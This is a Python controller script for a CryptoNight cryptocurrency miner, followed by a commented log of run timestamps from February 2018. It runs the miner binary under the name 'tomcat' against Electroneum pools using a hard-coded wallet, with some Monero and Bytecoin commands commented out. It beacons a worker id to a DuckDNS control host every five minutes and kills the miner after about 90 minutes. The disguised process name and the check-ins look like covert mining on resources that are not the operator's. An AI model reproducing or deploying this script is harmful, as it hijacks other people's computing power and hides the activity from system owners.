import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:05.137108
#2018-02-17 16:36:01.399084
#2018-02-17 18:24:07.264970
#2018-02-17 20:12:03.272810
#2018-02-17 21:59:05.440841
#2018-02-17 23:44:01.548149
#2018-02-18 01:35:06.861096
#2018-02-18 03:22:05.908012
#2018-02-18 05:10:08.926274
#2018-02-18 07:02:05.889915
#2018-02-18 08:50:03.410529
#2018-02-18 10:37:06.663697
#2018-02-18 12:22:01.807435
#2018-02-18 14:08:07.258517
#2018-02-18 15:58:07.266555
#2018-02-18 17:48:06.868688
#2018-02-18 19:36:01.414405
#2018-02-18 21:21:01.267081
#2018-02-18 23:08:06.074924
#2018-02-19 00:55:07.058259
#2018-02-19 02:42:05.056377
#2018-02-19 04:29:06.739522
#2018-02-19 06:14:05.819239
#2018-02-19 08:02:03.890051
#2018-02-19 09:52:03.785152
#2018-02-19 11:41:04.421857
#2018-02-19 13:27:06.871961
#2018-02-19 15:14:07.654000
#2018-02-19 17:03:08.636547
#2018-02-19 18:49:01.876536
#2018-02-19 20:38:08.026519
#2018-02-19 22:24:07.085832
#2018-02-20 00:10:08.923261
#2018-02-20 01:56:06.166719
#2018-02-20 03:47:07.315222
#2018-02-20 05:33:04.800725
#2018-02-20 07:17:03.935385
#2018-02-20 09:04:07.309978
#2018-02-20 10:47:05.589470
#2018-02-20 12:34:07.556033
#2018-02-20 14:21:07.619194
#2018-02-20 16:06:01.289567
#2018-02-20 17:51:09.389987
#2018-02-20 19:43:07.646971
#2018-02-20 21:29:06.937284
#2018-02-20 23:12:05.122065
#2018-02-21 00:56:01.329699
#2018-02-21 02:42:01.336167
#2018-02-21 04:29:05.922524
#2018-02-21 06:16:07.015413
#2018-02-21 08:02:01.799508
#2018-02-21 09:48:01.632784
#2018-02-21 11:37:06.865730
#2018-02-21 13:25:05.568072
#2018-02-21 15:10:07.689944
#2018-02-21 16:59:08.030267
#2018-02-21 18:48:02.151008
#2018-02-21 20:31:07.376614
#2018-02-21 22:17:05.962861
#2018-02-22 00:06:08.411616
#2018-02-22 01:55:04.036328
#2018-02-22 03:42:08.646358
#2018-02-22 05:29:03.604203
#2018-02-22 07:14:08.307661
#2018-02-22 09:02:07.973370
#2018-02-22 10:49:06.645982
#2018-02-22 12:34:08.916330
#2018-02-22 14:20:13.587787
#2018-02-22 16:08:07.624942
#2018-02-22 17:53:08.686497
#2018-02-22 19:41:07.213610
#2018-02-22 21:33:03.207868
#2018-02-22 23:20:07.428510
#2018-02-23 01:08:04.723508
#2018-02-23 02:56:04.328038
#2018-02-23 04:45:01.641063
#2018-02-23 06:33:06.216477
#2018-02-23 08:21:04.151141
#2018-02-23 10:37:05.889696
#2018-02-23 12:29:08.216872
#2018-02-23 14:17:07.008714
#2018-02-23 16:07:05.982829
#2018-02-23 17:52:06.795793
#2018-02-23 19:39:07.292001
#2018-02-23 21:23:05.322642
#2018-02-23 23:10:09.378813
#2018-02-24 00:51:03.533434
#2018-02-24 02:41:06.680753
#2018-02-24 04:35:08.028975
#2018-02-24 06:20:04.245711
#2018-02-24 08:08:04.952167
#2018-02-24 09:52:07.345878
#2018-02-24 11:47:07.280971
#2018-02-24 13:38:07.042815
#2018-02-24 15:26:06.779960
#2018-02-24 17:15:07.849593
#2018-02-24 19:08:01.490684
#2018-02-24 20:56:06.678690
#2018-02-24 23:22:07.842565
#2018-02-25 02:46:07.259624
#2018-02-25 06:24:04.385866
#2018-02-25 11:39:05.736665